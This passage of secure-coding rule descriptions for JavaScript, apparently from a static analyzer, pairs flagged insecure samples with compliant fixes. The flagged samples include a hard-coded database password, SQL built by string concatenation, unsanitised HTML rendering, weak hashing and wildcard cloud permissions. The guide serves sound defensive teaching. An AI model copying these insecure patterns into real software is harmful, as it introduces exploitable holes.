If a hostname validation failure prevents connecting to the target server, keep in mind that one system’s code should not work around another system’s problems, as this creates unnecessary dependencies and can lead to reliability issues.

Therefore, the first solution is to change the remote host’s certificate to match its identity. If the remote host is not under your control, consider replicating its service to a server whose certificate you can change yourself.

In case the contacted host is located on a development machine, and if there is no other choice, try following this solution:

  • Create a self-signed certificate for that machine.
  • Add this self-signed certificate to the system’s trust store.
  • If the hostname is not localhost, add the hostname in the /etc/hosts file.

Resources

Standards

javascript:S4790

Cryptographic hash algorithms such as MD2, MD4, MD5, MD6, HAVAL-128, HMAC-MD5, DSA (which uses SHA-1), RIPEMD, RIPEMD-128, RIPEMD-160, HMACRIPEMD160 and SHA-1 are no longer considered secure, because it is possible to have collisions (little computational effort is enough to find two or more different inputs that produce the same hash).

Ask Yourself Whether

The hashed value is used in a security context like:

  • User-password storage.
  • Security token generation (used to confirm e-mail when registering on a website, reset password, etc …​).
  • To compute some message integrity.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Safer alternatives such as SHA-256, SHA-512, or SHA-3 are recommended. For password hashing, it is even better to use algorithms that are deliberately slow to compute, like bcrypt, scrypt, argon2, or pbkdf2, because this slows down brute-force attacks.

Sensitive Code Example

const crypto = require("crypto");

const hash = crypto.createHash('sha1'); // Sensitive

Compliant Solution

const crypto = require("crypto");

const hash = crypto.createHash('sha512'); // Compliant

See

javascript:S6299

The Vue.js framework prevents XSS vulnerabilities by automatically escaping HTML content, using native browser APIs like innerText instead of innerHTML.

It’s still possible to explicitly use innerHTML and similar APIs to render HTML. Accidentally rendering malicious HTML data will introduce an XSS vulnerability into the application and enable a wide range of serious attacks, such as accessing or modifying sensitive information or impersonating other users.

Ask Yourself Whether

The application needs to render HTML content which:

  • could be user-controlled and was not previously sanitized.
  • is difficult to trace back to how it was constructed.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Avoid injecting HTML content with the v-html directive unless the content can be considered 100% safe; instead, rely as much as possible on Vue.js' built-in auto-escaping features.
  • Take care when using the v-bind:href directive to set URLs, which can contain malicious JavaScript (javascript:onClick(...)).
  • Event directives like :onmouseover are also prone to JavaScript injection and should not be used with unsafe values.

Sensitive Code Example

When using Vue.js templates, the v-html directive enables HTML rendering without any sanitization:

<div v-html="htmlContent"></div> <!-- Noncompliant -->

When using a rendering function, the innerHTML attribute enables HTML rendering without any sanitization:

Vue.component('element', {
  render: function (createElement) {
    return createElement(
      'div',
      {
        domProps: {
          innerHTML: this.htmlContent, // Noncompliant
        }
      }
    );
  },
});

When using JSX, the domPropsInnerHTML attribute enables HTML rendering without any sanitization:

<div domPropsInnerHTML={this.htmlContent}></div> {/* Noncompliant */}

Compliant Solution

When using Vue.js templates, putting the content as a child node of the element is safe:

<div>{{ htmlContent }}</div>

When using a rendering function, using the innerText attribute or putting the content as a child node of the element is safe:

Vue.component('element', {
  render: function (createElement) {
    return createElement(
      'div',
      {
        domProps: {
          innerText: this.htmlContent,
        }
      },
      this.htmlContent // Child node
    );
  },
});

When using JSX, putting the content as a child node of the element is safe:

<div>{this.htmlContent}</div>

See

javascript:S6304

A policy that allows identities to access all resources in an AWS account may violate the principle of least privilege. Suppose an identity has permission to access all resources even though it only requires access to some non-sensitive ones. In this case, unauthorized access to and disclosure of sensitive information may occur.

Ask Yourself Whether

The AWS account has more than one resource with different levels of sensitivity.

A risk exists if you answered yes to this question.

Recommended Secure Coding Practices

It’s recommended to apply the least privilege principle, i.e., to grant access only to the necessary resources. A good practice to achieve this is to organize or tag resources depending on the sensitivity level of the data they store or process. This makes secure access control management less error-prone.
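The rule's core check can be sketched as a small lint over a policy document in JSON form (a simplification for illustration, not the analyzer's actual implementation):

```javascript
// Returns the statements that allow actions on every resource ("*").
function findWildcardStatements(policy) {
  return policy.Statement.filter(s =>
    s.Effect === 'Allow' &&
    [].concat(s.Resource).includes('*') // Resource may be a string or an array
  );
}

const policy = {
  Statement: [
    { Effect: 'Allow', Action: ['iam:CreatePolicyVersion'], Resource: '*' },
    { Effect: 'Allow', Action: ['s3:GetObject'], Resource: 'arn:aws:s3:::team1-bucket/*' }
  ]
};
console.log(findWildcardStatements(policy).length); // 1
```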

Sensitive Code Example

The wildcard "*" is specified as the resource for this PolicyStatement. This grants the update permission for all policies of the account:

import { aws_iam as iam } from 'aws-cdk-lib'

new iam.PolicyDocument({
    statements: [
        new iam.PolicyStatement({
            effect: iam.Effect.ALLOW,
            actions: ["iam:CreatePolicyVersion"],
            resources: ["*"] // Sensitive
        })
    ]
})

Compliant Solution

Restrict the update permission to the appropriate subset of policies:

import { aws_iam as iam } from 'aws-cdk-lib'

new iam.PolicyDocument({
    statements: [
        new iam.PolicyStatement({
            effect: iam.Effect.ALLOW,
            actions: ["iam:CreatePolicyVersion"],
            resources: ["arn:aws:iam:::policy/team1/*"]
        })
    ]
})

Exceptions

  • Should not be raised on key policies (when AWS KMS actions are used.)
  • Should not be raised on policies not using any resources (if and only if all actions in the policy never require resources.)

See

javascript:S5332

Clear-text protocols such as ftp, telnet, or http lack encryption of transported data, as well as the capability to build an authenticated connection. This means that an attacker able to sniff traffic from the network can read, modify, or corrupt the transported content. These protocols are not secure as they expose applications to an extensive range of risks:

  • sensitive data exposure
  • traffic redirected to a malicious endpoint
  • malware-infected software update or installer
  • execution of client-side code
  • corruption of critical information

Even in the context of isolated networks like offline environments or segmented cloud environments, the insider threat exists. Thus, attacks involving communications being sniffed or tampered with can still happen.

For example, attackers could successfully compromise prior security layers by:

  • bypassing isolation mechanisms
  • compromising a component of the network
  • getting the credentials of an internal IAM account (either from a service account or an actual person)

In such cases, encrypting communications would decrease the chances of attackers successfully leaking data or stealing credentials from other network components. By layering various security practices (segmentation and encryption, for example), the application will follow the defense-in-depth principle.

Note that using the http protocol is being deprecated by major web browsers.

Clear-text protocols have led to documented vulnerabilities in the past.

Ask Yourself Whether

  • Application data needs to be protected against falsifications or leaks when transiting over the network.
  • Application data transits over an untrusted network.
  • Compliance rules require the service to encrypt data in transit.
  • Your application renders web pages with a relaxed mixed content policy.
  • OS-level protections against clear-text traffic are deactivated.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Make application data transit over a secure, authenticated and encrypted protocol like TLS or SSH. Here are a few alternatives to the most common clear-text protocols:
    • Use ssh as an alternative to telnet.
    • Use sftp, scp, or ftps instead of ftp.
    • Use https instead of http.
    • Use SMTP over SSL/TLS or SMTP with STARTTLS instead of clear-text SMTP.
  • Enable encryption of cloud components communications whenever it is possible.
  • Configure your application to block mixed content when rendering web pages.
  • If available, enforce OS-level deactivation of all clear-text traffic.

It is recommended to secure all transport channels, even on local networks, as it can take a single non-secure connection to compromise an entire application or system.

Sensitive Code Example

url = "http://example.com"; // Sensitive
url = "ftp://anonymous@example.com"; // Sensitive
url = "telnet://anonymous@example.com"; // Sensitive

For nodemailer:

const nodemailer = require("nodemailer");
let transporter = nodemailer.createTransport({
  secure: false, // Sensitive
  requireTLS: false // Sensitive
});
const nodemailer = require("nodemailer");
let transporter = nodemailer.createTransport({}); // Sensitive

For ftp:

var Client = require('ftp');
var c = new Client();
c.connect({
  'secure': false // Sensitive
});

For telnet-client:

const Telnet = require('telnet-client'); // Sensitive

For aws-cdk-lib.aws-elasticloadbalancingv2.ApplicationLoadBalancer:

import { ApplicationLoadBalancer } from 'aws-cdk-lib/aws-elasticloadbalancingv2';

const alb = new ApplicationLoadBalancer(this, 'ALB', {
  vpc: vpc,
  internetFacing: true
});

alb.addListener('listener-http-default', {
  port: 8080,
  open: true
}); // Sensitive

alb.addListener('listener-http-explicit', {
  protocol: ApplicationProtocol.HTTP, // Sensitive
  port: 8080,
  open: true
});

For aws-cdk-lib.aws-elasticloadbalancingv2.ApplicationListener:

import { ApplicationListener } from 'aws-cdk-lib/aws-elasticloadbalancingv2';

new ApplicationListener(this, 'listener-http-explicit-constructor', {
  loadBalancer: alb,
  protocol: ApplicationProtocol.HTTP, // Sensitive
  port: 8080,
  open: true
});

For aws-cdk-lib.aws-elasticloadbalancingv2.NetworkLoadBalancer:

import { NetworkLoadBalancer } from 'aws-cdk-lib/aws-elasticloadbalancingv2';

const nlb = new NetworkLoadBalancer(this, 'nlb', {
  vpc: vpc,
  internetFacing: true
});

var listenerNLB = nlb.addListener('listener-tcp-default', {
  port: 1234
}); // Sensitive

listenerNLB = nlb.addListener('listener-tcp-explicit', {
  protocol: Protocol.TCP, // Sensitive
  port: 1234
});

For aws-cdk-lib.aws-elasticloadbalancingv2.NetworkListener:

import { NetworkListener } from 'aws-cdk-lib/aws-elasticloadbalancingv2';

new NetworkListener(this, 'listener-tcp-explicit-constructor', {
  loadBalancer: nlb,
  protocol: Protocol.TCP, // Sensitive
  port: 8080
});

For aws-cdk-lib.aws-elasticloadbalancingv2.CfnListener:

import { CfnListener } from 'aws-cdk-lib/aws-elasticloadbalancingv2';

new CfnListener(this, 'listener-http', {
  defaultActions: defaultActions,
  loadBalancerArn: alb.loadBalancerArn,
  protocol: "HTTP", // Sensitive
  port: 80
});

new CfnListener(this, 'listener-tcp', {
  defaultActions: defaultActions,
  loadBalancerArn: alb.loadBalancerArn,
  protocol: "TCP", // Sensitive
  port: 80
});

For aws-cdk-lib.aws-elasticloadbalancing.CfnLoadBalancer:

import { CfnLoadBalancer } from 'aws-cdk-lib/aws-elasticloadbalancing';

new CfnLoadBalancer(this, 'elb-tcp', {
  listeners: [{
    instancePort: '1000',
    loadBalancerPort: '1000',
    protocol: 'tcp' // Sensitive
  }]
});

new CfnLoadBalancer(this, 'elb-http', {
  listeners: [{
    instancePort: '1000',
    loadBalancerPort: '1000',
    protocol: 'http' // Sensitive
  }]
});

For aws-cdk-lib.aws-elasticloadbalancing.LoadBalancer:

import { LoadBalancer } from 'aws-cdk-lib/aws-elasticloadbalancing';

const loadBalancer = new LoadBalancer(this, 'elb-tcp-dict', {
    vpc,
    internetFacing: true,
    healthCheck: {
    port: 80,
    },
    listeners: [
    {
        externalPort:10000,
        externalProtocol: LoadBalancingProtocol.TCP, // Sensitive
        internalPort:10000
    }]
});

loadBalancer.addListener({
  externalPort:10001,
  externalProtocol:LoadBalancingProtocol.TCP, // Sensitive
  internalPort:10001
});
loadBalancer.addListener({
  externalPort:10002,
  externalProtocol:LoadBalancingProtocol.HTTP, // Sensitive
  internalPort:10002
});

For aws-cdk-lib.aws-elasticache.CfnReplicationGroup:

import { CfnReplicationGroup } from 'aws-cdk-lib/aws-elasticache';

new CfnReplicationGroup(this, 'unencrypted-implicit', {
  replicationGroupDescription: 'exampleDescription'
}); // Sensitive

new CfnReplicationGroup(this, 'unencrypted-explicit', {
  replicationGroupDescription: 'exampleDescription',
  transitEncryptionEnabled: false // Sensitive
});

For aws-cdk-lib.aws-kinesis.CfnStream:

import { CfnStream } from 'aws-cdk-lib/aws-kinesis';

new CfnStream(this, 'cfnstream-implicit-unencrypted', undefined); // Sensitive

new CfnStream(this, 'cfnstream-explicit-unencrypted', {
  streamEncryption: undefined // Sensitive
});

For aws-cdk-lib.aws-kinesis.Stream:

import { Stream } from 'aws-cdk-lib/aws-kinesis';

new Stream(this, 'stream-explicit-unencrypted', {
  encryption: StreamEncryption.UNENCRYPTED // Sensitive
});

Compliant Solution

url = "https://example.com";
url = "sftp://anonymous@example.com";
url = "ssh://anonymous@example.com";

For nodemailer, one of the following options must be set:

const nodemailer = require("nodemailer");
let transporter = nodemailer.createTransport({
  secure: true,
  requireTLS: true,
  port: 465,
  secured: true
});

For ftp:

var Client = require('ftp');
var c = new Client();
c.connect({
  'secure': true
});

For aws-cdk-lib.aws-elasticloadbalancingv2.ApplicationLoadBalancer:

import { ApplicationLoadBalancer } from 'aws-cdk-lib/aws-elasticloadbalancingv2';

const alb = new ApplicationLoadBalancer(this, 'ALB', {
  vpc: vpc,
  internetFacing: true
});

alb.addListener('listener-https-explicit', {
  protocol: ApplicationProtocol.HTTPS,
  port: 8080,
  open: true,
  certificates: [certificate]
});

alb.addListener('listener-https-implicit', {
  port: 8080,
  open: true,
  certificates: [certificate]
});

For aws-cdk-lib.aws-elasticloadbalancingv2.ApplicationListener:

import { ApplicationListener } from 'aws-cdk-lib/aws-elasticloadbalancingv2';

new ApplicationListener(this, 'listener-https-explicit', {
  loadBalancer: loadBalancer,
  protocol: ApplicationProtocol.HTTPS,
  port: 8080,
  open: true,
  certificates: [certificate]
});

For aws-cdk-lib.aws-elasticloadbalancingv2.NetworkLoadBalancer:

import { NetworkLoadBalancer } from 'aws-cdk-lib/aws-elasticloadbalancingv2';

const nlb = new NetworkLoadBalancer(this, 'nlb', {
  vpc: vpc,
  internetFacing: true
});

nlb.addListener('listener-tls-explicit', {
  protocol: Protocol.TLS,
  port: 1234,
  certificates: [certificate]
});

nlb.addListener('listener-tls-implicit', {
  port: 1234,
  certificates: [certificate]
});

For aws-cdk-lib.aws-elasticloadbalancingv2.NetworkListener:

import { NetworkListener } from 'aws-cdk-lib/aws-elasticloadbalancingv2';

new NetworkListener(this, 'listener-tls-explicit', {
  loadBalancer: loadBalancer,
  protocol: Protocol.TLS,
  port: 8080,
  certificates: [certificate]
});

For aws-cdk-lib.aws-elasticloadbalancingv2.CfnListener:

import { CfnListener } from 'aws-cdk-lib/aws-elasticloadbalancingv2';

new CfnListener(this, 'listener-https', {
  defaultActions: defaultActions,
  loadBalancerArn: loadBalancerArn,
  protocol: "HTTPS",
  port: 80,
  certificates: [certificate]
});

new CfnListener(this, 'listener-tls', {
  defaultActions: defaultActions,
  loadBalancerArn: loadBalancerArn,
  protocol: "TLS",
  port: 80,
  certificates: [certificate]
});

For aws-cdk-lib.aws-elasticloadbalancing.CfnLoadBalancer:

import { CfnLoadBalancer } from 'aws-cdk-lib/aws-elasticloadbalancing';

new CfnLoadBalancer(this, 'elb-ssl', {
  listeners: [{
    instancePort: '1000',
    loadBalancerPort: '1000',
    protocol: 'ssl',
    sslCertificateId: sslCertificateId
  }]
});

new CfnLoadBalancer(this, 'elb-https', {
  listeners: [{
    instancePort: '1000',
    loadBalancerPort: '1000',
    protocol: 'https',
    sslCertificateId: sslCertificateId
  }]
});

For aws-cdk-lib.aws-elasticloadbalancing.LoadBalancer:

import { LoadBalancer, LoadBalancingProtocol } from 'aws-cdk-lib/aws-elasticloadbalancing';

const lb = new LoadBalancer(this, 'elb-ssl', {
  vpc,
  internetFacing: true,
  healthCheck: {
    port: 80,
  },
  listeners: [
    {
      externalPort:10000,
      externalProtocol:LoadBalancingProtocol.SSL,
      internalPort:10000
    }]
});

lb.addListener({
  externalPort:10001,
  externalProtocol:LoadBalancingProtocol.SSL,
  internalPort:10001
});
lb.addListener({
  externalPort:10002,
  externalProtocol:LoadBalancingProtocol.HTTPS,
  internalPort:10002
});

For aws-cdk-lib.aws-elasticache.CfnReplicationGroup:

import { CfnReplicationGroup } from 'aws-cdk-lib/aws-elasticache';

new CfnReplicationGroup(this, 'encrypted-explicit', {
  replicationGroupDescription: 'example',
  transitEncryptionEnabled: true
});

For aws-cdk-lib.aws-kinesis.Stream:

import { Stream } from 'aws-cdk-lib/aws-kinesis';

new Stream(this, 'stream-implicit-encrypted');

new Stream(this, 'stream-explicit-encrypted-selfmanaged', {
  encryption: StreamEncryption.KMS,
  encryptionKey: encryptionKey,
});

new Stream(this, 'stream-explicit-encrypted-managed', {
  encryption: StreamEncryption.MANAGED
});

For aws-cdk-lib.aws-kinesis.CfnStream:

import { CfnStream } from 'aws-cdk-lib/aws-kinesis';

new CfnStream(this, 'cfnstream-explicit-encrypted', {
  streamEncryption: {
    encryptionType: encryptionType,
    keyId: encryptionKey.keyId,
  }
});

Exceptions

No issue is reported for the following cases because they are not considered sensitive:

  • Insecure protocol scheme followed by loopback addresses like 127.0.0.1 or localhost.
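The loopback exception can be sketched as a predicate over the URL's hostname (illustrative only; the rule's real implementation may differ):

```javascript
// True when a URL targets only the local machine (loopback addresses),
// in which case an insecure scheme is not flagged by this rule.
function isLoopbackUrl(rawUrl) {
  const { hostname } = new URL(rawUrl);
  return hostname === 'localhost' || hostname === '127.0.0.1' || hostname === '[::1]';
}

console.log(isLoopbackUrl('http://127.0.0.1:8080/health')); // true
console.log(isLoopbackUrl('http://example.com'));           // false
```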

See

javascript:S2068

Because it is easy to extract strings from an application source code or binary, credentials should not be hard-coded. This is particularly true for applications that are distributed or that are open-source.

Hard-coded credentials have led to documented vulnerabilities in the past.

Credentials should be stored outside of the code in a configuration file, a database, or a management service for secrets.

This rule flags instances of hard-coded credentials used in database and LDAP connections. It looks for hard-coded credentials in connection strings, and for variable names that match any of the patterns from the provided list.

It’s recommended to customize the configuration of this rule with additional credential words such as "oauthToken", "secret", …​

Ask Yourself Whether

  • Credentials allow access to a sensitive component like a database, a file storage, an API or a service.
  • Credentials are used in production environments.
  • Application re-distribution is required before updating the credentials.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Store the credentials in a configuration file that is not pushed to the code repository.
  • Store the credentials in a database.
  • Use your cloud provider’s service for managing secrets.
  • If a password has been disclosed through the source code: change it.

Sensitive Code Example

var mysql = require('mysql');

var connection = mysql.createConnection(
{
  host:'localhost',
  user: "admin",
  database: "project",
  password: "mypassword", // Sensitive
  multipleStatements: true
});

connection.connect();

Compliant Solution

var mysql = require('mysql');

var connection = mysql.createConnection({
  host: process.env.MYSQL_URL,
  user: process.env.MYSQL_USERNAME,
  password: process.env.MYSQL_PASSWORD,
  database: process.env.MYSQL_DATABASE
});
connection.connect();

See

javascript:S6303

Using unencrypted RDS DB resources exposes data to unauthorized access.
This includes database data, logs, automatic backups, read replicas, snapshots, and cluster metadata.

This situation can occur in a variety of scenarios, such as:

  • A malicious insider working at the cloud provider gains physical access to the storage device.
  • Unknown attackers penetrate the cloud provider’s logical infrastructure and systems.

After a successful intrusion, the underlying applications are exposed to:

  • theft of intellectual property and/or personal data
  • extortion
  • denial of services and security bypasses via data corruption or deletion

AWS-managed encryption at rest reduces this risk with a simple switch.

Ask Yourself Whether

  • The database contains sensitive data that could cause harm when leaked.
  • There are compliance requirements for the service to store data encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It is recommended to enable encryption at rest on any RDS DB resource, regardless of the engine.
No further maintenance is required, as encryption at rest is fully managed by AWS.

Sensitive Code Example

For aws-cdk-lib.aws_rds.CfnDBCluster:

import { aws_rds as rds } from 'aws-cdk-lib';

new rds.CfnDBCluster(this, 'example', {
  storageEncrypted: false, // Sensitive
});

For aws-cdk-lib.aws_rds.CfnDBInstance:

import { aws_rds as rds } from 'aws-cdk-lib';

new rds.CfnDBInstance(this, 'example', {
  storageEncrypted: false, // Sensitive
});

For aws-cdk-lib.aws_rds.DatabaseCluster:

import { aws_rds as rds } from 'aws-cdk-lib';
import { aws_ec2 as ec2 } from 'aws-cdk-lib';

declare const vpc: ec2.Vpc;

const cluster = new rds.DatabaseCluster(this, 'example', {
  engine: rds.DatabaseClusterEngine.auroraMysql({ version: rds.AuroraMysqlEngineVersion.VER_2_08_1 }),
  instanceProps: {
    vpcSubnets: {
      subnetType: ec2.SubnetType.PRIVATE_WITH_EGRESS,
    },
    vpc,
  },
  storageEncrypted: false, // Sensitive
});

For aws-cdk-lib.aws_rds.DatabaseClusterFromSnapshot:

import { aws_rds as rds } from 'aws-cdk-lib';
import { aws_ec2 as ec2 } from 'aws-cdk-lib';

declare const vpc: ec2.Vpc;

new rds.DatabaseClusterFromSnapshot(this, 'example', {
  engine: rds.DatabaseClusterEngine.aurora({ version: rds.AuroraEngineVersion.VER_1_22_2 }),
  instanceProps: {
    vpc,
  },
  snapshotIdentifier: 'exampleSnapshot',
  storageEncrypted: false, // Sensitive
});

For aws-cdk-lib.aws_rds.DatabaseInstance:

import { aws_rds as rds } from 'aws-cdk-lib';
import { aws_ec2 as ec2 } from 'aws-cdk-lib';

declare const vpc: ec2.Vpc;

new rds.DatabaseInstance(this, 'example', {
  engine: rds.DatabaseInstanceEngine.POSTGRES,
  vpc,
  storageEncrypted: false, // Sensitive
});

For aws-cdk-lib.aws_rds.DatabaseInstanceReadReplica:

import { aws_rds as rds } from 'aws-cdk-lib';
import { aws_ec2 as ec2 } from 'aws-cdk-lib';

declare const sourceInstance: rds.DatabaseInstance;
declare const vpc: ec2.Vpc;

new rds.DatabaseInstanceReadReplica(this, 'example', {
  sourceDatabaseInstance: sourceInstance,
  instanceType: ec2.InstanceType.of(ec2.InstanceClass.BURSTABLE2, ec2.InstanceSize.LARGE),
  vpc,
  storageEncrypted: false, // Sensitive
});

Compliant Solution

For aws-cdk-lib.aws_rds.CfnDBCluster:

import { aws_rds as rds } from 'aws-cdk-lib';

new rds.CfnDBCluster(this, 'example', {
  storageEncrypted: true,
});

For aws-cdk-lib.aws_rds.CfnDBInstance:

import { aws_rds as rds } from 'aws-cdk-lib';

new rds.CfnDBInstance(this, 'example', {
  storageEncrypted: true,
});

For aws-cdk-lib.aws_rds.DatabaseCluster:

import { aws_rds as rds } from 'aws-cdk-lib';

declare const vpc: ec2.Vpc;

const cluster = new rds.DatabaseCluster(this, 'example', {
  engine: rds.DatabaseClusterEngine.auroraMysql({ version: rds.AuroraMysqlEngineVersion.VER_2_08_1 }),
  instanceProps: {
    vpcSubnets: {
      subnetType: ec2.SubnetType.PRIVATE_WITH_EGRESS,
    },
    vpc,
  },
  storageEncrypted: true,
});

For aws-cdk-lib.aws_rds.DatabaseClusterFromSnapshot:

import { aws_rds as rds } from 'aws-cdk-lib';
import { aws_ec2 as ec2 } from 'aws-cdk-lib';

declare const vpc: ec2.Vpc;

new rds.DatabaseClusterFromSnapshot(this, 'example', {
  engine: rds.DatabaseClusterEngine.aurora({ version: rds.AuroraEngineVersion.VER_1_22_2 }),
  instanceProps: {
    vpc,
  },
  snapshotIdentifier: 'exampleSnapshot',
  storageEncrypted: true,
});

For aws-cdk-lib.aws_rds.DatabaseInstance:

import { aws_rds as rds } from 'aws-cdk-lib';
import { aws_ec2 as ec2 } from 'aws-cdk-lib';

declare const vpc: ec2.Vpc;

new rds.DatabaseInstance(this, 'example', {
  engine: rds.DatabaseInstanceEngine.POSTGRES,
  vpc,
  storageEncrypted: true,
});

For aws-cdk-lib.aws_rds.DatabaseInstanceReadReplica:

import { aws_rds as rds } from 'aws-cdk-lib';
import { aws_ec2 as ec2 } from 'aws-cdk-lib';

declare const sourceInstance: rds.DatabaseInstance;
declare const vpc: ec2.Vpc;

new rds.DatabaseInstanceReadReplica(this, 'example', {
  sourceDatabaseInstance: sourceInstance,
  instanceType: ec2.InstanceType.of(ec2.InstanceClass.BURSTABLE2, ec2.InstanceSize.LARGE),
  vpc,
  storageEncrypted: true,
});

See

javascript:S6302

A policy that grants all permissions may indicate improper access control, which violates the principle of least privilege. Suppose an identity is granted full permissions to a resource even though it only requires read permission to work as expected. In this case, resources may be unintentionally overwritten, resulting in loss of information.

Ask Yourself Whether

Identities obtaining all the permissions:

  • only require a subset of these permissions to perform the intended function.
  • have monitored activity showing that only a subset of these permissions is actually used.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to apply the least privilege principle, i.e. to grant identities only the permissions they need. A good practice is to start with the very minimum set of permissions and to refine the policy over time. To fix overly permissive policies already deployed in production, one strategy is to review the monitored activity and reduce the set of permissions to those actually used.

Sensitive Code Example

A customer-managed policy that grants all permissions by using the wildcard (*) in the Action property:

import { aws_iam as iam } from 'aws-cdk-lib'

new iam.PolicyStatement({
    effect: iam.Effect.ALLOW,
    actions: ["*"], // Sensitive
    resources: ["arn:aws:iam:::user/*"],
})

Compliant Solution

A customer-managed policy that grants only the required permissions:

import { aws_iam as iam } from 'aws-cdk-lib'

new iam.PolicyStatement({
    effect: iam.Effect.ALLOW,
    actions: ["iam:GetAccountSummary"],
    resources: ["arn:aws:iam:::user/*"],
})

See

javascript:S6308

Amazon OpenSearch Service is a managed service to host OpenSearch instances. It replaces Elasticsearch Service, which has been deprecated.

To harden domain (cluster) data in case of unauthorized access, OpenSearch provides data-at-rest encryption if the engine is OpenSearch (any version), or Elasticsearch with a version of 5.1 or above. Enabling encryption at rest will help protect:

  • indices
  • logs
  • swap files
  • data in the application directory
  • automated snapshots

Thus, adversaries cannot access the data if they gain physical access to the storage medium.

Ask Yourself Whether

  • The database contains sensitive data that could cause harm when leaked.
  • There are compliance requirements for the service to store data encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It is recommended to encrypt OpenSearch domains that contain sensitive information.

OpenSearch handles encryption and decryption transparently, so no further modifications to the application are necessary.

Sensitive Code Example

For aws-cdk-lib.aws_opensearchservice.Domain:

import { aws_opensearchservice as opensearchservice } from 'aws-cdk-lib';

const exampleDomain = new opensearchservice.Domain(this, 'ExampleDomain', {
  version: opensearchservice.EngineVersion.OPENSEARCH_1_3,
}); // Sensitive, encryption must be explicitly enabled

For aws-cdk-lib.aws_opensearchservice.CfnDomain:

import { aws_opensearchservice as opensearchservice } from 'aws-cdk-lib';

const exampleCfnDomain = new opensearchservice.CfnDomain(this, 'ExampleCfnDomain', {
  engineVersion: 'OpenSearch_1.3',
}); // Sensitive, encryption must be explicitly enabled

Compliant Solution

For aws-cdk-lib.aws_opensearchservice.Domain:

import { aws_opensearchservice as opensearchservice } from 'aws-cdk-lib';

const exampleDomain = new opensearchservice.Domain(this, 'ExampleDomain', {
  version: opensearchservice.EngineVersion.OPENSEARCH_1_3,
  encryptionAtRest: {
    enabled: true,
  },
});

For aws-cdk-lib.aws_opensearchservice.CfnDomain:

import { aws_opensearchservice as opensearchservice } from 'aws-cdk-lib';

const exampleCfnDomain = new opensearchservice.CfnDomain(this, 'ExampleCfnDomain', {
  engineVersion: 'OpenSearch_1.3',
  encryptionAtRestOptions: {
    enabled: true,
  },
});

See

javascript:S5691

Hidden files are created automatically by many tools to save user preferences; well-known examples are .profile, .bashrc, .bash_history and .git. To keep listings uncluttered, these files are not displayed by default by operating system commands like ls.

Outside of the user environment, hidden files are sensitive because they are used to store privacy-related information or even hard-coded secrets.

Ask Yourself Whether

  • Hidden files may have been inadvertently uploaded to the static server’s public directory, and the server accepts requests for hidden files.
  • There is no business use case for serving files whose names begin with a dot, but the server is not configured to reject requests for them.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Disable the serving of hidden files.

Sensitive Code Example

Express.js serve-static middleware:

let serveStatic = require("serve-static");
let app = express();
let serveStaticMiddleware = serveStatic('public', { 'index': false, 'dotfiles': 'allow'});   // Sensitive
app.use(serveStaticMiddleware);

Compliant Solution

Express.js serve-static middleware:

let serveStatic = require("serve-static");
let app = express();
let serveStaticMiddleware = serveStatic('public', { 'index': false, 'dotfiles': 'ignore'});   // Compliant: ignore or deny are recommended values
let serveStaticDefault = serveStatic('public', { 'index': false});   // Compliant: by default, "dotfiles" (files or directories whose names begin with a dot) are not served; note, however, that files within a directory that begins with a dot are not ignored (see the serve-static module documentation)
app.use(serveStaticMiddleware);

See

javascript:S5693

Rejecting requests with a significant content length is a good practice: it controls network traffic intensity and resource consumption, and thus helps prevent DoS attacks.

Ask Yourself Whether

  • size limits are not defined for the different resources of the web application.
  • the web application is not protected by rate limiting features.
  • the web application infrastructure has limited resources.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • For most of the features of an application, it is recommended to limit the size of requests to:
    • at most 8 MB for file uploads.
    • at most 2 MB for other requests.

It is recommended to customize the rule with the limit values that correspond to the web application.

Sensitive Code Example

formidable file upload module:

const form = new Formidable();
form.maxFileSize = 10000000; // Sensitive: 10MB is more than the recommended limit of 8MB

const formDefault = new Formidable(); // Sensitive, the default value is 200MB

multer (Express.js middleware) file upload module:

let diskUpload = multer({
  storage: diskStorage,
  limits: {
    fileSize: 10000000 // Sensitive: 10MB is more than the recommended limit of 8MB
  }
});

let diskUploadUnlimited = multer({ // Sensitive: the default value is no limit
  storage: diskStorage,
});

body-parser module:

// 4MB is more than the recommended limit of 2MB for non-file-upload requests
let jsonParser = bodyParser.json({ limit: "4mb" }); // Sensitive
let urlencodedParser = bodyParser.urlencoded({ extended: false, limit: "4mb" }); // Sensitive

Compliant Solution

formidable file upload module:

const form = new Formidable();
form.maxFileSize = 8000000; // Compliant: 8MB

multer (Express.js middleware) file upload module:

let diskUpload = multer({
  storage: diskStorage,
  limits: {
     fileSize: 8000000 // Compliant: 8MB
  }
});

body-parser module:

let jsonParser = bodyParser.json(); // Compliant, when the limit is not defined, the default value is set to 100kb
let urlencodedParser = bodyParser.urlencoded({ extended: false, limit: "2mb" }); // Compliant

See

javascript:S2077

Formatted SQL queries can be difficult to maintain and debug, and concatenating untrusted values into them increases the risk of SQL injection. Note that this rule doesn’t detect SQL injections (unlike rule S3649); its goal is only to highlight complex or formatted queries.

Ask Yourself Whether

  • Some parts of the query come from untrusted values (like user inputs).
  • The query is repeated/duplicated in other parts of the code.
  • The application must support different types of relational databases.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Use parameterized queries, prepared statements, or stored procedures, and bind user-provided values to query parameters rather than concatenating them into the SQL string.
Sensitive Code Example

// === MySQL ===
const mysql = require('mysql');
const mycon = mysql.createConnection({ host: host, user: user, password: pass, database: db });
mycon.connect(function(err) {
  mycon.query('SELECT * FROM users WHERE id = ' + userinput, (err, res) => {}); // Sensitive
});

// === PostgreSQL ===
const pg = require('pg');
const pgcon = new pg.Client({ host: host, user: user, password: pass, database: db });
pgcon.connect();
pgcon.query('SELECT * FROM users WHERE id = ' + userinput, (err, res) => {}); // Sensitive

Compliant Solution

// === MySQL ===
const mysql = require('mysql');
const mycon = mysql.createConnection({ host: host, user: user, password: pass, database: db });
mycon.connect(function(err) {
  mycon.query('SELECT name FROM users WHERE id = ?', [userinput], (err, res) => {});
});

// === PostgreSQL ===
const pg = require('pg');
